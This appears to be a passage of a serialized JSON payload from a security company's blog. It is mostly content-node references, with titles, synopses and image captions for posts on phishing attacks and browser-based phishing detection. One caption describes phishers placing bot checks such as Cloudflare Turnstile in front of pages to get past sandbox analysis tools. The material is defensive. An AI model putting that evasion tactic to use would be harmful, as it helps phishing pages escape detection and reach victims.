","2025-03-28T00:00:00.000Z","dissecting-a-recent-mailchimp-phishing-attack",{"items":122346},[122347,122349],{"sys":122348,"name":505},{"id":504},{"sys":122350,"name":509},{"id":508},{"items":122352},[122353],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":122354},{"url":1496},{"__typename":1528,"sys":122356,"content":122357,"title":107128,"synopsis":107129,"hashTags":118,"publishedDate":107130,"slug":107131,"tagsCollection":122737,"authorsCollection":122743},{"id":106695},{"json":122358},{"data":122359,"content":122360,"nodeType":165},{},[122361,122387,122403,122409,122415,122418,122425,122431,122436,122441,122446,122452,122468,122473,122476,122483,122489,122495,122501,122506,122512,122518,122523,122529,122545,122550,122556,122559,122566,122572,122577,122583,122624,122629,122635,122638,122645,122651,122657,122662,122667,122672,122675,122682,122688,122693,122699,122705,122708,122715,122721],{"data":122362,"content":122363,"nodeType":178},{},[122364,122367,122374,122377,122384],{"data":122365,"marks":122366,"value":37,"nodeType":173},{},[],{"data":122368,"content":122369,"nodeType":186},{"uri":19838},[122370],{"data":122371,"marks":122372,"value":39940,"nodeType":173},{},[122373],{"type":194},{"data":122375,"marks":122376,"value":106716,"nodeType":173},{},[],{"data":122378,"content":122379,"nodeType":186},{"uri":106719},[122380],{"data":122381,"marks":122382,"value":88245,"nodeType":173},{},[122383],{"type":194},{"data":122385,"marks":122386,"value":106728,"nodeType":173},{},[],{"data":122388,"content":122389,"nodeType":178},{},[122390,122393,122400],{"data":122391,"marks":122392,"value":106735,"nodeType":173},{},[],{"data":122394,"content":122395,"nodeType":186},{"uri":106738},[122396],{"data":122397,"marks":122398,"value":106744,"nodeType":173},{},[122399],{"type":194},{"data":122401,"marks":122402,"value":106748,"nodeType":173},{},[],{"data":122404,"content":122405,"nodeType":178},{},[122406],{"data":122407,"marks":122408,"value":106755,"nodeType":173},{},[],{"data":122410,"content":122411,"nodeType":178},{},[122412],{"data":122413,"marks":122414,"value":106762,"nodeType":173},{},[],{"data":122416,"content":122417,"nodeType":231},{},[],{"data":122419,"content":122420,"nodeType":169},{},[122421],{"data":122422,"marks":122423,"value":106773,"nodeType":173},{},[122424],{"type":370},{"data":122426,"content":122427,"nodeType":178},{},[122428],{"data":122429,"marks":122430,"value":106780,"nodeType":173},{},[],{"data":122432,"content":122435,"nodeType":312},{"target":122433},{"sys":122434},{"id":106785,"type":317,"linkType":318},[],{"data":122437,"content":122440,"nodeType":312},{"target":122438},{"sys":122439},{"id":106791,"type":317,"linkType":318},[],{"data":122442,"content":122445,"nodeType":312},{"target":122443},{"sys":122444},{"id":106797,"type":317,"linkType":318},[],{"data":122447,"content":122448,"nodeType":178},{},[122449],{"data":122450,"marks":122451,"value":106805,"nodeType":173},{},[],{"data":122453,"content":122454,"nodeType":178},{},[122455,122458,122465],{"data":122456,"marks":122457,"value":106812,"nodeType":173},{},[],{"data":122459,"content":122460,"nodeType":186},{"uri":106815},[122461],{"data":122462,"marks":122463,"value":106821,"nodeType":173},{},[122464],{"type":194},{"data":122466,"marks":122467,"value":106825,"nodeType":173},{},[],{"data":122469,"content":122472,"nodeType":312},{"target":122470},{"sys":122471},{"id":106830,"type":317,"linkType":318},[],{"data":122474,"content":122475,"nodeType":231},{},[],{"data":122477,"content":122478,"nodeType":169},{},[122479],{"data":122480,"marks":122481,"value":106842,"nodeType":173},{},[122482],{"type":370},{"data":122484,"content":122485,"nodeType":178},{},[122486],{"data":122487,"marks":122488,"value":106849,"nodeType":173},{},[],{"data":122490,"content":122491,"nodeType":178},{},[122492],{"data":122493,"marks":122494,"value":106856,"nodeType":173},{},[],{"data":122496,"content":122497,"nodeType":178},{},[122498],{"data":122499,"marks":122500,"value":106863,"nodeType":173},{},[],{"data":122502,"content":122505,"nodeType":312},{"target":122503},{"sys":122504},{"id":106868,"type":317,"linkType":318},[],{"data":122507,"content":122508,"nodeType":178},{},[122509],{"data":122510,"marks":122511,"value":106876,"nodeType":173},{},[],{"data":122513,"content":122514,"nodeType":178},{},[122515],{"data":122516,"marks":122517,"value":106883,"nodeType":173},{},[],{"data":122519,"content":122522,"nodeType":312},{"target":122520},{"sys":122521},{"id":106888,"type":317,"linkType":318},[],{"data":122524,"content":122525,"nodeType":178},{},[122526],{"data":122527,"marks":122528,"value":106896,"nodeType":173},{},[],{"data":122530,"content":122531,"nodeType":178},{},[122532,122535,122542],{"data":122533,"marks":122534,"value":106903,"nodeType":173},{},[],{"data":122536,"content":122537,"nodeType":186},{"uri":74693},[122538],{"data":122539,"marks":122540,"value":70035,"nodeType":173},{},[122541],{"type":194},{"data":122543,"marks":122544,"value":106914,"nodeType":173},{},[],{"data":122546,"content":122549,"nodeType":312},{"target":122547},{"sys":122548},{"id":69500,"type":317,"linkType":318},[],{"data":122551,"content":122552,"nodeType":178},{},[122553],{"data":122554,"marks":122555,"value":106926,"nodeType":173},{},[],{"data":122557,"content":122558,"nodeType":231},{},[],{"data":122560,"content":122561,"nodeType":169},{},[122562],{"data":122563,"marks":122564,"value":106937,"nodeType":173},{},[122565],{"type":370},{"data":122567,"content":122568,"nodeType":178},{},[122569],{"data":122570,"marks":122571,"value":106944,"nodeType":173},{},[],{"data":122573,"content":122576,"nodeType":312},{"target":122574},{"sys":122575},{"id":106949,"type":317,"linkType":318},[],{"data":122578,"content":122579,"nodeType":178},{},[122580],{"data":122581,"marks":122582,"value":106957,"nodeType":173},{},[],{"data":122584,"content":122585,"nodeType":250},{},[122586,122605],{"data":122587,"content":122588,"nodeType":254},{},[122589],{"data":122590,"content":122591,"nodeType":178},{},[122592,122595,122602],{"data":122593,"marks":122594,"value":37,"nodeType":173},{},[],{"data":122596,"content":122597,"nodeType":186},{"uri":74693},[122598],{"data":122599,"marks":122600,"value":106977,"nodeType":173},{},[122601],{"type":194},{"data":122603,"marks":122604,"value":106981,"nodeType":173},{},[],{"data":122606,"content":122607,"nodeType":254},{},[122608],{"data":122609,"content":122610,"nodeType":178},{},[122611,122614,122621],{"data":122612,"marks":122613,"value":37,"nodeType":173},{},[],{"data":122615,"content":122616,"nodeType":186},{"uri":97747},[122617],{"data":122618,"marks":122619,"value":106998,"nodeType":173},{},[122620],{"type":194},{"data":122622,"marks":122623,"value":107002,"nodeType":173},{},[],{"data":122625,"content":122628,"nodeType":312},{"target":122626},{"sys":122627},{"id":107007,"type":317,"linkType":318},[],{"data":122630,"content":122631,"nodeType":178},{},[122632],{"data":122633,"marks":122634,"value":107015,"nodeType":173},{},[],{"data":122636,"content":122637,"nodeType":231},{},[],{"data":122639,"content":122640,"nodeType":169},{},[122641],{"data":122642,"marks":122643,"value":107026,"nodeType":173},{},[122644],{"type":370},{"data":122646,"content":122647,"nodeType":178},{},[122648],{"data":122649,"marks":122650,"value":107033,"nodeType":173},{},[],{"data":122652,"content":122653,"nodeType":178},{},[122654],{"data":122655,"marks":122656,"value":107040,"nodeType":173},{},[],{"data":122658,"content":122661,"nodeType":312},{"target":122659},{"sys":122660},{"id":107045,"type":317,"linkType":318},[],{"data":122663,"content":122666,"nodeType":312},{"target":122664},{"sys":122665},{"id":98287,"type":317,"linkType":318},[],{"data":122668,"content":122671,"nodeType":312},{"target":122669},{"sys":122670},{"id":107056,"type":317,"linkType":318},[],{"data":122673,"content":122674,"nodeType":231},{},[],{"data":122676,"content":122677,"nodeType":169},{},[122678],{"data":122679,"marks":122680,"value":107068,"nodeType":173},{},[122681],{"type":370},{"data":122683,"content":122684,"nodeType":178},{},[122685],{"data":122686,"marks":122687,"value":107075,"nodeType":173},{},[],{"data":122689,"content":122692,"nodeType":312},{"target":122690},{"sys":122691},{"id":107080,"type":317,"linkType":318},[],{"data":122694,"content":122695,"nodeType":178},{},[122696],{"data":122697,"marks":122698,"value":107088,"nodeType":173},{},[],{"data":122700,"content":122701,"nodeType":178},{},[122702],{"data":122703,"marks":122704,"value":107095,"nodeType":173},{},[],{"data":122706,"content":122707,"nodeType":231},{},[],{"data":122709,"content":122710,"nodeType":169},{},[122711],{"data":122712,"marks":122713,"value":461,"nodeType":173},{},[122714],{"type":370},{"data":122716,"content":122717,"nodeType":178},{},[122718],{"data":122719,"marks":122720,"value":98309,"nodeType":173},{},[],{"data":122722,"content":122723,"nodeType":178},{},[122724,122727,122734],{"data":122725,"marks":122726,"value":61741,"nodeType":173},{},[],{"data":122728,"content":122729,"nodeType":186},{"uri":77659},[122730],{"data":122731,"marks":122732,"value":476,"nodeType":173},{},[122733],{"type":194},{"data":122735,"marks":122736,"value":69758,"nodeType":173},{},[],{"items":122738},[122739,122741],{"sys":122740,"name":505},{"id":504},{"sys":122742,"name":509},{"id":508},{"items":122744},[122745],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":122746},{"url":1496},{"items":122748},[122749],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":122750},{"url":1496},{"json":122752,"links":123311},{"nodeType":165,"data":122753,"content":122754},{},[122755,122761,122767,122773,122776,122783,122789,122805,122835,122840,122856,122861,122881,122884,122891,122897,122910,122923,122928,122934,122940,122945,122958,122961,122968,122974,122980,122986,122992,122995,123002,123008,123014,123030,123036,123043,123082,123088,123093,123099,123104,123110,123113,123120,123133,123139,123173,123183,123186,123193,123199,123205,123235,123241,123258,123263,123268,123271,123278,123284,123300,123305],{"nodeType":178,"data":122756,"content":122757},{},[122758],{"nodeType":173,"value":97703,"marks":122759,"data":122760},[],{},{"nodeType":178,"data":122762,"content":122763},{},[122764],{"nodeType":173,"value":97710,"marks":122765,"data":122766},[],{},{"nodeType":178,"data":122768,"content":122769},{},[122770],{"nodeType":173,"value":97717,"marks":122771,"data":122772},[],{},{"nodeType":231,"data":122774,"content":122775},{},[],{"nodeType":169,"data":122777,"content":122778},{},[122779],{"nodeType":173,"value":97727,"marks":122780,"data":122782},[122781],{"type":370},{},{"nodeType":178,"data":122784,"content":122785},{},[122786],{"nodeType":173,"value":97735,"marks":122787,"data":122788},[],{},{"nodeType":178,"data":122790,"content":122791},{},[122792,122795,122802],{"nodeType":173,"value":97742,"marks":122793,"data":122794},[],{},{"nodeType":186,"data":122796,"content":122797},{"uri":97747},[122798],{"nodeType":173,"value":97750,"marks":122799,"data":122801},[122800],{"type":194},{},{"nodeType":173,"value":97755,"marks":122803,"data":122804},[],{},{"nodeType":250,"data":122806,"content":122807},{},[122808,122817,122826],{"nodeType":254,"data":122809,"content":122810},{},[122811],{"nodeType":178,"data":122812,"content":122813},{},[122814],{"nodeType":173,"value":97768,"marks":122815,"data":122816},[],{},{"nodeType":254,"data":122818,"content":122819},{},[122820],{"nodeType":178,"data":122821,"content":122822},{},[122823],{"nodeType":173,"value":97778,"marks":122824,"data":122825},[],{},{"nodeType":254,"data":122827,"content":122828},{},[122829],{"nodeType":178,"data":122830,"content":122831},{},[122832],{"nodeType":173,"value":97788,"marks":122833,"data":122834},[],{},{"nodeType":312,"data":122836,"content":122839},{"target":122837},{"sys":122838},{"id":97795,"type":317,"linkType":318},[],{"nodeType":178,"data":122841,"content":122842},{},[122843,122846,122853],{"nodeType":173,"value":97801,"marks":122844,"data":122845},[],{},{"nodeType":186,"data":122847,"content":122848},{"uri":97806},[122849],{"nodeType":173,"value":97809,"marks":122850,"data":122852},[122851],{"type":194},{},{"nodeType":173,"value":97814,"marks":122854,"data":122855},[],{},{"nodeType":312,"data":122857,"content":122860},{"target":122858},{"sys":122859},{"id":97821,"type":317,"linkType":318},[],{"nodeType":178,"data":122862,"content":122863},{},[122864,122867,122871,122874,122878],{"nodeType":173,"value":97827,"marks":122865,"data":122866},[],{},{"nodeType":173,"value":97831,"marks":122868,"data":122870},[122869],{"type":370},{},{"nodeType":173,"value":97836,"marks":122872,"data":122873},[],{},{"nodeType":173,"value":5440,"marks":122875,"data":122877},[122876],{"type":370},{},{"nodeType":173,"value":97844,"marks":122879,"data":122880},[],{},{"nodeType":231,"data":122882,"content":122883},{},[],{"nodeType":169,"data":122885,"content":122886},{},[122887],{"nodeType":173,"value":97854,"marks":122888,"data":122890},[122889],{"type":370},{},{"nodeType":178,"data":122892,"content":122893},{},[122894],{"nodeType":173,"value":97862,"marks":122895,"data":122896},[],{},{"nodeType":178,"data":122898,"content":122899},{},[122900,122903,122907],{"nodeType":173,"value":97869,"marks":122901,"data":122902},[],{},{"nodeType":173,"value":4821,"marks":122904,"data":122906},[122905],{"type":1646},{},{"nodeType":173,"value":97877,"marks":122908,"data":122909},[],{},{"nodeType":178,"data":122911,"content":122912},{},[122913,122916,122920],{"nodeType":173,"value":97884,"marks":122914,"data":122915},[],{},{"nodeType":173,"value":97888,"marks":122917,"data":122919},[122918],{"type":370},{},{"nodeType":173,"value":197,"marks":122921,"data":122922},[],{},{"nodeType":312,"data":122924,"content":122927},{"target":122925},{"sys":122926},{"id":97899,"type":317,"linkType":318},[],{"nodeType":178,"data":122929,"content":122930},{},[122931],{"nodeType":173,"value":97905,"marks":122932,"data":122933},[],{},{"nodeType":178,"data":122935,"content":122936},{},[122937],{"nodeType":173,"value":97912,"marks":122938,"data":122939},[],{},{"nodeType":312,"data":122941,"content":122944},{"target":122942},{"sys":122943},{"id":97919,"type":317,"linkType":318},[],{"nodeType":178,"data":122946,"content":122947},{},[122948,122951,122955],{"nodeType":173,"value":97925,"marks":122949,"data":122950},[],{},{"nodeType":173,"value":97929,"marks":122952,"data":122954},[122953],{"type":370},{},{"nodeType":173,"value":97934,"marks":122956,"data":122957},[],{},{"nodeType":231,"data":122959,"content":122960},{},[],{"nodeType":169,"data":122962,"content":122963},{},[122964],{"nodeType":173,"value":97944,"marks":122965,"data":122967},[122966],{"type":370},{},{"nodeType":178,"data":122969,"content":122970},{},[122971],{"nodeType":173,"value":97952,"marks":122972,"data":122973},[],{},{"nodeType":178,"data":122975,"content":122976},{},[122977],{"nodeType":173,"value":97959,"marks":122978,"data":122979},[],{},{"nodeType":178,"data":122981,"content":122982},{},[122983],{"nodeType":173,"value":97966,"marks":122984,"data":122985},[],{},{"nodeType":178,"data":122987,"content":122988},{},[122989],{"nodeType":173,"value":97973,"marks":122990,"data":122991},[],{},{"nodeType":231,"data":122993,"content":122994},{},[],{"nodeType":169,"data":122996,"content":122997},{},[122998],{"nodeType":173,"value":97983,"marks":122999,"data":123001},[123000],{"type":370},{},{"nodeType":178,"data":123003,"content":123004},{},[123005],{"nodeType":173,"value":97991,"marks":123006,"data":123007},[],{},{"nodeType":178,"data":123009,"content":123010},{},[123011],{"nodeType":173,"value":97998,"marks":123012,"data":123013},[],{},{"nodeType":178,"data":123015,"content":123016},{},[123017,123020,123027],{"nodeType":173,"value":98005,"marks":123018,"data":123019},[],{},{"nodeType":186,"data":123021,"content":123022},{"uri":98010},[123023],{"nodeType":173,"value":98013,"marks":123024,"data":123026},[123025],{"type":194},{},{"nodeType":173,"value":98018,"marks":123028,"data":123029},[],{},{"nodeType":178,"data":123031,"content":123032},{},[123033],{"nodeType":173,"value":98025,"marks":123034,"data":123035},[],{},{"nodeType":178,"data":123037,"content":123038},{},[123039],{"nodeType":173,"value":98032,"marks":123040,"data":123042},[123041],{"type":370},{},{"nodeType":250,"data":123044,"content":123045},{},[123046,123055,123064,123073],{"nodeType":254,"data":123047,"content":123048},{},[123049],{"nodeType":178,"data":123050,"content":123051},{},[123052],{"nodeType":173,"value":81804,"marks":123053,"data":123054},[],{},{"nodeType":254,"data":123056,"content":123057},{},[123058],{"nodeType":178,"data":123059,"content":123060},{},[123061],{"nodeType":173,"value":98055,"marks":123062,"data":123063},[],{},{"nodeType":254,"data":123065,"content":123066},{},[123067],{"nodeType":178,"data":123068,"content":123069},{},[123070],{"nodeType":173,"value":98065,"marks":123071,"data":123072},[],{},{"nodeType":254,"data":123074,"content":123075},{},[123076],{"nodeType":178,"data":123077,"content":123078},{},[123079],{"nodeType":173,"value":98075,"marks":123080,"data":123081},[],{},{"nodeType":178,"data":123083,"content":123084},{},[123085],{"nodeType":173,"value":98082,"marks":123086,"data":123087},[],{},{"nodeType":312,"data":123089,"content":123092},{"target":123090},{"sys":123091},{"id":98089,"type":317,"linkType":318},[],{"nodeType":178,"data":123094,"content":123095},{},[123096],{"nodeType":173,"value":98095,"marks":123097,"data":123098},[],{},{"nodeType":312,"data":123100,"content":123103},{"target":123101},{"sys":123102},{"id":98102,"type":317,"linkType":318},[],{"nodeType":178,"data":123105,"content":123106},{},[123107],{"nodeType":173,"value":98108,"marks":123108,"data":123109},[],{},{"nodeType":231,"data":123111,"content":123112},{},[],{"nodeType":169,"data":123114,"content":123115},{},[123116],{"nodeType":173,"value":98118,"marks":123117,"data":123119},[123118],{"type":370},{},{"nodeType":178,"data":123121,"content":123122},{},[123123,123126,123130],{"nodeType":173,"value":98126,"marks":123124,"data":123125},[],{},{"nodeType":173,"value":98130,"marks":123127,"data":123129},[123128],{"type":370},{},{"nodeType":173,"value":197,"marks":123131,"data":123132},[],{},{"nodeType":178,"data":123134,"content":123135},{},[123136],{"nodeType":173,"value":98141,"marks":123137,"data":123138},[],{},{"nodeType":178,"data":123140,"content":123141},{},[123142,123145,123149,123152,123156,123159,123163,123166,123170],{"nodeType":173,"value":98148,"marks":123143,"data":123144},[],{},{"nodeType":173,"value":98152,"marks":123146,"data":123148},[123147],{"type":370},{},{"nodeType":173,"value":98157,"marks":123150,"data":123151},[],{},{"nodeType":173,"value":98161,"marks":123153,"data":123155},[123154],{"type":370},{},{"nodeType":173,"value":98166,"marks":123157,"data":123158},[],{},{"nodeType":173,"value":98161,"marks":123160,"data":123162},[123161],{"type":370},{},{"nodeType":173,"value":98174,"marks":123164,"data":123165},[],{},{"nodeType":173,"value":98178,"marks":123167,"data":123169},[123168],{"type":370},{},{"nodeType":173,"value":98183,"marks":123171,"data":123172},[],{},{"nodeType":178,"data":123174,"content":123175},{},[123176,123179],{"nodeType":173,"value":98190,"marks":123177,"data":123178},[],{},{"nodeType":173,"value":98194,"marks":123180,"data":123182},[123181],{"type":370},{},{"nodeType":231,"data":123184,"content":123185},{},[],{"nodeType":169,"data":123187,"content":123188},{},[123189],{"nodeType":173,"value":98205,"marks":123190,"data":123192},[123191],{"type":370},{},{"nodeType":178,"data":123194,"content":123195},{},[123196],{"nodeType":173,"value":98213,"marks":123197,"data":123198},[],{},{"nodeType":178,"data":123200,"content":123201},{},[123202],{"nodeType":173,"value":98220,"marks":123203,"data":123204},[],{},{"nodeType":250,"data":123206,"content":123207},{},[123208,123217,123226],{"nodeType":254,"data":123209,"content":123210},{},[123211],{"nodeType":178,"data":123212,"content":123213},{},[123214],{"nodeType":173,"value":98233,"marks":123215,"data":123216},[],{},{"nodeType":254,"data":123218,"content":123219},{},[123220],{"nodeType":178,"data":123221,"content":123222},{},[123223],{"nodeType":173,"value":98243,"marks":123224,"data":123225},[],{},{"nodeType":254,"data":123227,"content":123228},{},[123229],{"nodeType":178,"data":123230,"content":123231},{},[123232],{"nodeType":173,"value":98253,"marks":123233,"data":123234},[],{},{"nodeType":178,"data":123236,"content":123237},{},[123238],{"nodeType":173,"value":98260,"marks":123239,"data":123240},[],{},{"nodeType":178,"data":123242,"content":123243},{},[123244,123248,123255],{"nodeType":173,"value":98267,"marks":123245,"data":123247},[123246],{"type":370},{},{"nodeType":186,"data":123249,"content":123250},{"uri":98273},[123251],{"nodeType":173,"value":98276,"marks":123252,"data":123254},[123253],{"type":194},{},{"nodeType":173,"value":37,"marks":123256,"data":123257},[],{},{"nodeType":312,"data":123259,"content":123262},{"target":123260},{"sys":123261},{"id":98287,"type":317,"linkType":318},[],{"nodeType":312,"data":123264,"content":123267},{"target":123265},{"sys":123266},{"id":98293,"type":317,"linkType":318},[],{"nodeType":231,"data":123269,"content":123270},{},[],{"nodeType":169,"data":123272,"content":123273},{},[123274],{"nodeType":173,"value":18605,"marks":123275,"data":123277},[123276],{"type":370},{},{"nodeType":178,"data":123279,"content":123280},{},[123281],{"nodeType":173,"value":98309,"marks":123282,"data":123283},[],{},{"nodeType":178,"data":123285,"content":123286},{},[123287,123290,123297],{"nodeType":173,"value":61741,"marks":123288,"data":123289},[],{},{"nodeType":186,"data":123291,"content":123292},{"uri":98320},[123293],{"nodeType":173,"value":1472,"marks":123294,"data":123296},[123295],{"type":194},{},{"nodeType":173,"value":1477,"marks":123298,"data":123299},[],{},{"nodeType":312,"data":123301,"content":123304},{"target":123302},{"sys":123303},{"id":98333,"type":317,"linkType":318},[],{"nodeType":178,"data":123306,"content":123307},{},[123308],{"nodeType":173,"value":37,"marks":123309,"data":123310},[],{},{"entries":123312},{"hyperlink":123313,"inline":123314,"block":123315},[],[],[123316,123323,123329,123335,123339,123346,123351,123354,123358],{"sys":123317,"__typename":5345,"title":123318,"caption":123318,"layoutMode":118,"file":123319},{"id":97795},"Implementing bot checks like Clouflare Turnstile is an effective way to bypass sandbox analysis tools",{"url":123320,"width":123321,"height":123322},"https://images.ctfassets.net/y1cdw1ablpvd/DbEYzQt7m3jY56ALCYWEy/59846e7bd4a3ed204722a9d561e97231/image2.png",938,361,{"sys":123324,"__typename":5345,"title":123325,"caption":123325,"layoutMode":118,"file":123326},{"id":97821},"Attackers are bypassing email by targeting their victims across IM, social media, using malicious ads, and by sending messages using trusted apps",{"url":123327,"width":5358,"height":123328},"https://images.ctfassets.net/y1cdw1ablpvd/70wT3oO5yuDvKcdVDTwsca/0bebd357b1f6c61ff690fcdc3af297fe/image6.png",874,{"sys":123330,"__typename":5345,"title":123331,"caption":118,"layoutMode":118,"file":123332},{"id":97899},"EDR enabled real-time detection and response at the OS level rather than relying on traffic to and from the endpoint. ",{"url":123333,"width":5358,"height":123334},"https://images.ctfassets.net/y1cdw1ablpvd/3gSjR1ecPh6HIhaG27mMLl/018623f5cadfa9866a2b452899c6357e/image5.png",1187,{"sys":123336,"__typename":5345,"title":123337,"caption":123337,"layoutMode":118,"file":123338},{"id":97919},"Current phishing detection isn’t in the right place to observe and stop malicious activity in real time.",{"url":96398,"width":96399,"height":96400},{"sys":123340,"__typename":5345,"title":123341,"caption":123342,"layoutMode":118,"file":123343},{"id":98089},"Phishing pyramid of pain","Getting real-time visibility of page/user behavior and malicious toolkits running on the page is key to moving to TTP-based detections, rather than chasing quickly-changing IoCs",{"url":123344,"width":5358,"height":123345},"https://images.ctfassets.net/y1cdw1ablpvd/4uJD4Qgy3EH0x2ilhV7UsO/262f91bd23f54d557a2cc1da1a8ac6d8/image1.png",1352,{"sys":123347,"__typename":5345,"title":123348,"caption":123349,"layoutMode":118,"file":123350},{"id":98102},"Browser activity detection","Being in the browser gives you unrivalled visibility of phishing page activity and user behavior",{"url":96405,"width":96406,"height":96407},{"sys":123352,"__typename":5345,"title":121096,"caption":121097,"layoutMode":118,"file":123353},{"id":98287},{"url":121099,"width":23880,"height":19654},{"sys":123355,"__typename":15269,"type":15270,"ctaText":123356,"buttonLabel":123357,"buttonColour":15273,"buttonUrl":9120},{"id":98293},"See how Push detects and blocks phishing attacks in the browser.","Read the Blog",{"sys":123359,"__typename":15269,"type":15270,"ctaText":121051,"buttonLabel":64975,"buttonColour":15273,"buttonUrl":121052},{"id":98333},"content:blog:three-reasons-why-browser-is-best-for-stopping-phishing-attacks.json","blog/three-reasons-why-browser-is-best-for-stopping-phishing-attacks.json","blog/three-reasons-why-browser-is-best-for-stopping-phishing-attacks",{"_path":123364,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":123365,"ogImage":118,"summary":123368,"title":123379,"subtitle":118,"metaTitle":123379,"synopsis":123380,"hashTags":118,"publishedDate":98343,"slug":123381,"tagsCollection":123382,"relatedBlogPostsCollection":123388,"authorsCollection":124872,"content":124876,"_id":125415,"_type":5439,"_source":5440,"_file":125416,"_stem":125417,"_extension":5439},"/blog/why-most-phishing-attacks-feel-like-a-zero-day",{"id":123366,"publishedAt":123367},"7JngmuGwqKvYLzU8bGMTQD","2026-01-30T09:15:36.969Z",{"json":123369},{"data":123370,"content":123371,"nodeType":165},{},[123372],{"data":123373,"content":123374,"nodeType":178},{},[123375],{"data":123376,"marks":123377,"value":123378,"nodeType":173},{},[],"Most phishing attacks involve a phishing page that has never been seen before. When anti-phishing relies on detecting and blocking based on known bad, it makes every attack feel like a zero-day.","Why most phishing attacks feel like a zero-day","Most phishing attacks involve a phishing page that has never been seen before. When detection relies on known-bad, this makes every attack feel like a zero-day.","why-most-phishing-attacks-feel-like-a-zero-day",{"items":123383},[123384,123386],{"sys":123385,"name":509},{"id":508},{"sys":123387,"name":505},{"id":504},{"items":123389},[123390,123808,124480],{"__typename":1528,"sys":123391,"content":123392,"title":69761,"synopsis":69762,"hashTags":118,"publishedDate":69763,"slug":69764,"tagsCollection":123798,"authorsCollection":123804},{"id":69294},{"json":123393},{"nodeType":165,"data":123394,"content":123395},{},[123396,123403,123409,123415,123420,123426,123431,123437,123443,123446,123453,123459,123465,123486,123492,123495,123502,123515,123520,123526,123531,123537,123543,123546,123553,123569,123574,123580,123585,123588,123595,123611,123616,123622,123627,123643,123648,123653,123656,123663,123669,123675,123680,123683,123690,123696,123702,123705,123712,123718,123724,123729,123735,123765,123770,123777,123783],{"nodeType":169,"data":123397,"content":123398},{},[123399],{"nodeType":173,"value":24096,"marks":123400,"data":123402},[123401],{"type":370},{},{"nodeType":178,"data":123404,"content":123405},{},[123406],{"nodeType":173,"value":69310,"marks":123407,"data":123408},[],{},{"nodeType":178,"data":123410,"content":123411},{},[123412],{"nodeType":173,"value":69317,"marks":123413,"data":123414},[],{},{"nodeType":312,"data":123416,"content":123419},{"target":123417},{"sys":123418},{"id":63196,"type":317,"linkType":318},[],{"nodeType":178,"data":123421,"content":123422},{},[123423],{"nodeType":173,"value":69329,"marks":123424,"data":123425},[],{},{"nodeType":312,"data":123427,"content":123430},{"target":123428},{"sys":123429},{"id":69336,"type":317,"linkType":318},[],{"nodeType":178,"data":123432,"content":123433},{},[123434],{"nodeType":173,"value":69342,"marks":123435,"data":123436},[],{},{"nodeType":178,"data":123438,"content":123439},{},[123440],{"nodeType":173,"value":69349,"marks":123441,"data":123442},[],{},{"nodeType":231,"data":123444,"content":123445},{},[],{"nodeType":169,"data":123447,"content":123448},{},[123449],{"nodeType":173,"value":69359,"marks":123450,"data":123452},[123451],{"type":370},{},{"nodeType":178,"data":123454,"content":123455},{},[123456],{"nodeType":173,"value":69367,"marks":123457,"data":123458},[],{},{"nodeType":178,"data":123460,"content":123461},{},[123462],{"nodeType":173,"value":69374,"marks":123463,"data":123464},[],{},{"nodeType":250,"data":123466,"content":123467},{},[123468,123477],{"nodeType":254,"data":123469,"content":123470},{},[123471],{"nodeType":178,"data":123472,"content":123473},{},[123474],{"nodeType":173,"value":69387,"marks":123475,"data":123476},[],{},{"nodeType":254,"data":123478,"content":123479},{},[123480],{"nodeType":178,"data":123481,"content":123482},{},[123483],{"nodeType":173,"value":69397,"marks":123484,"data":123485},[],{},{"nodeType":178,"data":123487,"content":123488},{},[123489],{"nodeType":173,"value":69404,"marks":123490,"data":123491},[],{},{"nodeType":231,"data":123493,"content":123494},{},[],{"nodeType":169,"data":123496,"content":123497},{},[123498],{"nodeType":173,"value":69414,"marks":123499,"data":123501},[123500],{"type":370},{},{"nodeType":178,"data":123503,"content":123504},{},[123505,123508,123512],{"nodeType":173,"value":69422,"marks":123506,"data":123507},[],{},{"nodeType":173,"value":8046,"marks":123509,"data":123511},[123510],{"type":370},{},{"nodeType":173,"value":69430,"marks":123513,"data":123514},[],{},{"nodeType":312,"data":123516,"content":123519},{"target":123517},{"sys":123518},{"id":69437,"type":317,"linkType":318},[],{"nodeType":178,"data":123521,"content":123522},{},[123523],{"nodeType":173,"value":69443,"marks":123524,"data":123525},[],{},{"nodeType":312,"data":123527,"content":123530},{"target":123528},{"sys":123529},{"id":69450,"type":317,"linkType":318},[],{"nodeType":178,"data":123532,"content":123533},{},[123534],{"nodeType":173,"value":69456,"marks":123535,"data":123536},[],{},{"nodeType":178,"data":123538,"content":123539},{},[123540],{"nodeType":173,"value":69463,"marks":123541,"data":123542},[],{},{"nodeType":231,"data":123544,"content":123545},{},[],{"nodeType":235,"data":123547,"content":123548},{},[123549],{"nodeType":173,"value":69473,"marks":123550,"data":123552},[123551],{"type":370},{},{"nodeType":178,"data":123554,"content":123555},{},[123556,123559,123566],{"nodeType":173,"value":69481,"marks":123557,"data":123558},[],{},{"nodeType":186,"data":123560,"content":123561},{"uri":61655},[123562],{"nodeType":173,"value":69488,"marks":123563,"data":123565},[123564],{"type":194},{},{"nodeType":173,"value":69493,"marks":123567,"data":123568},[],{},{"nodeType":312,"data":123570,"content":123573},{"target":123571},{"sys":123572},{"id":69500,"type":317,"linkType":318},[],{"nodeType":178,"data":123575,"content":123576},{},[123577],{"nodeType":173,"value":69506,"marks":123578,"data":123579},[],{},{"nodeType":312,"data":123581,"content":123584},{"target":123582},{"sys":123583},{"id":69513,"type":317,"linkType":318},[],{"nodeType":231,"data":123586,"content":123587},{},[],{"nodeType":169,"data":123589,"content":123590},{},[123591],{"nodeType":173,"value":69522,"marks":123592,"data":123594},[123593],{"type":370},{},{"nodeType":178,"data":123596,"content":123597},{},[123598,123601,123608],{"nodeType":173,"value":69530,"marks":123599,"data":123600},[],{},{"nodeType":186,"data":123602,"content":123603},{"uri":69535},[123604],{"nodeType":173,"value":69538,"marks":123605,"data":123607},[123606],{"type":194},{},{"nodeType":173,"value":69543,"marks":123609,"data":123610},[],{},{"nodeType":312,"data":123612,"content":123615},{"target":123613},{"sys":123614},{"id":69550,"type":317,"linkType":318},[],{"nodeType":178,"data":123617,"content":123618},{},[123619],{"nodeType":173,"value":69556,"marks":123620,"data":123621},[],{},{"nodeType":312,"data":123623,"content":123626},{"target":123624},{"sys":123625},{"id":69563,"type":317,"linkType":318},[],{"nodeType":178,"data":123628,"content":123629},{},[123630,123633,123640],{"nodeType":173,"value":69569,"marks":123631,"data":123632},[],{